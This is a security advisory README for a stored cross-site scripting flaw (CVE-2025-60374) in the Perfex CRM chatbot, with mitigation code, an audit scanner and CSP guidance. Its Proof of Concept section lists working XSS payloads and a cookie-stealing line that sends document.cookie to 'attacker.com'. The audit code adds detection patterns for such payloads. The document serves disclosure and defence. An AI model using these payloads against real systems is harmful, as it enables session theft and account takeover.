
CVE-2025-60374 PoC — Perfex CRM security vulnerability

Related vulnerability
Title: Perfex CRM security vulnerability (CVE-2025-60374)
Description: Perfex CRM is an open-source customer relationship management application from Perfex CRM, used to manage customers and projects and to create invoices in the cloud. Perfex CRM contains a security vulnerability that stems from the Chatbot module not filtering user input, which may lead to a stored cross-site scripting (XSS) attack.

Introduction
# CVE-2025-60374
CVE-2025-60374: Stored Cross-Site Scripting (XSS) in Perfex CRM Chatbot

> **⚠️ Security Advisory**  
> A critical Stored Cross-Site Scripting vulnerability in Perfex CRM's chatbot feature

[![CVE](https://img.shields.io/badge/CVE-2025--60374-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60374)
[![Severity](https://img.shields.io/badge/Severity-High-orange)]()
[![CWE](https://img.shields.io/badge/CWE-79-blue)](https://cwe.mitre.org/data/definitions/79.html)

---

## 📋 Overview

A stored cross-site scripting (XSS) vulnerability in the chatbot component of Perfex CRM, prior to version 3.3.1, allows attackers to inject arbitrary JavaScript code through chat messages. The malicious payload is stored in the application database and executed in the browsers of users viewing the chat conversation, enabling session token theft, unauthorized actions on behalf of victims, and other client-side attacks.

## 🎯 Affected Versions

- **Product:** Perfex CRM
- **Vendor:** Perfex CRM
- **Vulnerable Versions:** < 3.3.1
- **Fixed Version:** 3.3.1+

## 🔍 Vulnerability Details

| Attribute | Value |
|-----------|-------|
| **CVE ID** | CVE-2025-60374 |
| **Type** | Stored Cross-Site Scripting (XSS) |
| **CWE** | [CWE-79](https://cwe.mitre.org/data/definitions/79.html) |
| **Attack Vector** | Network/Remote |
| **Authentication** | Required (Low Privilege) |
| **User Interaction** | None to Minimal |
| **Discoverer** | Ajansha Shankar |

### Description

The chatbot's message parameter in Perfex CRM lacks proper input sanitization and output encoding. When users submit messages through the chatbot interface, malicious HTML/JavaScript payloads are stored in the database without adequate filtering and subsequently rendered without proper escaping, leading to code execution in other users' browsers.

### Root Cause

- ❌ Insufficient input validation on chatbot message parameter
- ❌ Missing output encoding when rendering stored messages
- ❌ Session cookies not marked as `HttpOnly`
- ❌ Lack of Content Security Policy (CSP)
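The following is an added example, not code from the Perfex CRM project or from this advisory, showing the rendering pattern described above beside its hardened form. The function and variable names (`render_message_vulnerable`, `render_message_hardened`, `json_for_inline_script`) are assumptions for illustration; the sample messages are constructed from the PoC payloads listed further down in this README.

```php
<?php
// Added example (not Perfex CRM's own code): the vulnerable rendering pattern
// beside its hardened form. Names are assumptions for illustration; the
// sample messages below are constructed from this README's PoC payloads.

declare(strict_types=1);

// Vulnerable: the stored message is concatenated into the page as raw HTML,
// so a message such as <img src=x onerror=...> becomes live markup.
function render_message_vulnerable(string $stored_message): string
{
    return '<div class="chat-msg">' . $stored_message . '</div>';
}

// Hardened: encode for the HTML element context at output time.
// ENT_QUOTES also encodes ' and " so the value is safe inside attributes;
// ENT_SUBSTITUTE avoids returning an empty string on invalid UTF-8, which
// would otherwise silently drop the message instead of failing visibly.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function render_message_hardened(string $stored_message): string
{
    return '<div class="chat-msg">' . html_encode($stored_message) . '</div>';
}

// Chat widgets commonly receive the conversation as JSON and insert it with
// JavaScript. If that JSON is embedded inside a <script> block, a message
// containing "</script>" would break out of it, so <, >, &, ', " are emitted
// as \uXXXX escapes as well.
function json_for_inline_script(array $messages): string
{
    return json_encode(
        $messages,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed sample rows, using the PoC payloads from this advisory.
$sample_messages = [
    "hello, I need help with invoice #42",
    "<img src=x onerror=alert('XSS executed!')>",
    "<meter value=2 min=0 max=10 onmouseover=alert('XSS triggered!')>2 out of 10</meter>",
];

foreach ($sample_messages as $msg) {
    echo "vulnerable: " . render_message_vulnerable($msg) . PHP_EOL;
    echo "hardened:   " . render_message_hardened($msg) . PHP_EOL;
}
echo json_for_inline_script($sample_messages) . PHP_EOL;
```

Run with `php` on the command line: the hardened output shows every `<`, `>` and quote from the PoC payloads turned into entities, so the browser displays the payload as text instead of executing it. The element-context encoding and the JSON-in-script encoding are different contexts and need different escaping; applying only one of them leaves the other path open.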

## 💥 Impact

### Security Implications

- **🔓 Session Hijacking:** Attackers can steal session tokens via `document.cookie` access
- **👤 Account Takeover:** Complete compromise of victim accounts
- **🎭 Privilege Escalation:** Administrator account compromise if admin views malicious message
- **📊 Data Exfiltration:** Access to sensitive information in user's browser context
- **🎪 Phishing:** Ability to modify page content and redirect users

### CIA Triad Assessment

| Factor | Impact | Explanation |
|--------|--------|-------------|
| **Confidentiality** | 🔴 HIGH | Session tokens and sensitive data can be stolen |
| **Integrity** | 🔴 HIGH | Unauthorized actions can be performed as the victim |
| **Availability** | 🟡 LOW | Limited impact on system availability |

## 🧪 Proof of Concept

### PoC 1: Basic Image XSS
```html
<img src=x onerror=alert('XSS executed!')>
```

### PoC 2: Interactive Button XSS
```html
<button onclick=alert('Click executed!')>Click here</button>
```

### PoC 3: Auto-playing Embedded Content
```html
<iframe width="560" height="315" 
src="<link>" 
frameborder="0" allow="accelerometer; autoplay; clipboard-write; 
encrypted-media; gyroscope; picture-in-picture" allowfullscreen>
</iframe>
```

### PoC 4: Event-based XSS
```html
<meter value=2 min=0 max=10 onmouseover=alert('XSS triggered!')>
2 out of 10
</meter>
```

### Real-World Attack Scenario

**Cookie Theft Example:**
```html
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
```

This payload would send the victim's session cookie to an attacker-controlled server, enabling complete account takeover.

## 🛡️ Mitigation

### For End Users

1. **✅ Upgrade Immediately:** Update to Perfex CRM v3.3.1 or later
2. **🔍 Audit Messages:** Review chatbot history for suspicious HTML/JavaScript content
3. **🔄 Reset Sessions:** Force all users to re-authenticate after patching
4. **📝 Monitor Logs:** Check for unusual chatbot activity
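An added example of the "Audit Messages" step, not part of the Perfex CRM project or of this advisory: a defender-side scan over stored chatbot messages that flags rows carrying HTML tags, event-handler attributes, `javascript:` URIs, or entity- or URL-encoded variants of these. The row shape (`id`, `sender`, `message`) and the function name `audit_messages` are assumptions, since the advisory does not name the chatbot table or its columns; the rows are constructed and include the PoC payloads from this README.

```php
<?php
// Added example (not Perfex CRM's own code): audit stored chatbot messages
// for content that should never appear in a plain-text chat field.
// Row shape and indicator names are assumptions; the rows are constructed.

declare(strict_types=1);

/** Indicators worth a closer look in a field that should only hold plain chat text. */
const XSS_INDICATORS = [
    'html_tag'        => '/<\s*[a-z][a-z0-9-]*[\s\/>]/i',   // any opening tag
    'event_handler'   => '/\bon[a-z]+\s*=/i',                 // onerror=, onclick=, onmouseover=
    'script_or_frame' => '/<\s*(script|iframe|object|embed|svg)\b/i',
    'js_uri'          => '/javascript\s*:/i',                 // href="javascript:..."
    'encoded_tag'     => '/&(lt|#0*60|#x0*3c);/i',            // "<" hidden as an entity
];

/**
 * Return the rows that match at least one indicator, together with the
 * indicator names that fired, so an analyst can triage them.
 */
function audit_messages(array $rows): array
{
    $findings = [];
    foreach ($rows as $row) {
        // Decode first so a payload stored URL-encoded ("%3Cimg") is not missed.
        $text = rawurldecode((string) $row['message']);
        $hits = [];
        foreach (XSS_INDICATORS as $name => $pattern) {
            if (preg_match($pattern, $text) === 1) {
                $hits[] = $name;
            }
        }
        if ($hits !== []) {
            $findings[] = ['id' => $row['id'], 'sender' => $row['sender'], 'indicators' => $hits];
        }
    }
    return $findings;
}

// Constructed sample rows. In a real audit these come from the chatbot
// messages table; its name and columns are not given in this advisory.
$rows = [
    ['id' => 1, 'sender' => 'client-17', 'message' => 'Can you resend the invoice?'],
    ['id' => 2, 'sender' => 'client-17', 'message' => "<img src=x onerror=alert('XSS executed!')>"],
    ['id' => 3, 'sender' => 'client-23', 'message' => '2 < 3 and 5 > 4, right?'],
    ['id' => 4, 'sender' => 'client-08', 'message' => "<button onclick=alert('Click executed!')>Click here</button>"],
    ['id' => 5, 'sender' => 'client-31', 'message' => '%3Ciframe src=%22https://example.invalid%22%3E%3C/iframe%3E'],
];

foreach (audit_messages($rows) as $finding) {
    printf("message %d from %s: %s\n",
        $finding['id'], $finding['sender'], implode(', ', $finding['indicators']));
}
```

Row 3 is deliberately benign: a bare `<` followed by a digit does not match the tag pattern, so ordinary comparisons in chat text are not flagged, while rows 2, 4 and 5 are reported with the indicators that fired. Treat matches as triage input rather than proof of compromise, and review the sender accounts and the time window around each flagged message alongside the application logs.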

### For Developers

#### Immediate Fixes
```php
<?php
// Input handling example: encode on the way in (defence in depth only).
$message = htmlspecialchars($input_message, ENT_QUOTES, 'UTF-8');

// Output encoding example: encode again wherever the stored message is
// rendered; this is the control that actually prevents the stored XSS.
echo htmlspecialchars($stored_message, ENT_QUOTES, 'UTF-8');
```

#### Long-term Security Improvements

1. **Content Security Policy (CSP)**
```http
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
```

2. **HttpOnly Cookies**
```php
setcookie('session', $value, [
    'httponly' => true,
    'secure' => true,
    'samesite' => 'Strict'
]);
```

3. **Input Validation Library**
```php
// Use HTML Purifier (PHP) or a similar allow-list HTML sanitizer;
// DOMPurify is the browser-side equivalent.
$config = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);
$clean_html = $purifier->purify($dirty_html);
```
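An added example, not Perfex CRM's own code, that applies the two header-level improvements above (CSP and hardened session cookies) in one bootstrap routine. It goes beyond the snippets above in two ways: the CSP carries a per-request nonce so the chat page's own inline scripts keep working under `script-src 'self'`, and a report-only mode allows the policy to be rolled out before it is enforced. The function names `harden_session_cookie` and `send_csp` are assumptions; adjust `frame-src` if the deployment legitimately embeds frames.

```php
<?php
// Added example (not Perfex CRM's own code): apply the session-cookie and CSP
// hardening together. Function names are assumptions. Must run before
// session_start() and before any output, because both controls are sent as
// response headers.

declare(strict_types=1);

function harden_session_cookie(): void
{
    // Array form of session_set_cookie_params() (PHP >= 7.3) covers the
    // session cookie that the setcookie() example above sets by hand.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // only sent over HTTPS
        'httponly' => true,   // not readable via document.cookie, which the cookie-theft PoC relies on
        'samesite' => 'Strict',
    ]);
    session_start();
}

/**
 * Emit a CSP that blocks injected inline handlers such as onerror=... while
 * still allowing the application's own scripts. Inline scripts the chat page
 * legitimately needs get a per-request nonce; the nonce is returned so the
 * template can add nonce="..." to those <script> tags. Nonces do not
 * whitelist inline event handlers, so the PoC payloads stay blocked.
 * $report_only rolls the policy out as Content-Security-Policy-Report-Only
 * so violations are reported without breaking the UI.
 */
function send_csp(bool $report_only = false): string
{
    $nonce  = base64_encode(random_bytes(16));
    $policy = implode('; ', [
        "default-src 'self'",
        "script-src 'self' 'nonce-{$nonce}'",
        "object-src 'none'",
        "frame-src 'none'",          // blocks the injected <iframe> of PoC 3; relax if frames are needed
        "base-uri 'self'",
        "frame-ancestors 'self'",
    ]);
    $name = $report_only ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy';
    header("{$name}: {$policy}");
    return $nonce;
}

harden_session_cookie();
$nonce = send_csp();
// The application's own bootstrap script carries the nonce; anything injected
// into a chat message does not and is refused by the browser.
echo '<script nonce="' . htmlspecialchars($nonce, ENT_QUOTES, 'UTF-8') . '">/* chat widget bootstrap */</script>';
```

None of this replaces output encoding: CSP and `HttpOnly` limit what an injected payload can do, while the encoding fix removes the injection itself.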

## 📚 References

- [CWE-79: Cross-site Scripting (XSS)](https://cwe.mitre.org/data/definitions/79.html)
- [OWASP XSS Prevention Cheat Sheet](https://owasp.org/www-community/attacks/xss/)
- [CVE-2025-60374 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-60374)


## 👤 Credits

**Discovered by:** 
[Ajansha Shankar](https://www.linkedin.com/in/ajansha-shankar/)
, [Ahamed Yaseen](https://www.linkedin.com/in/ahamed-yaseen-a1216b93/)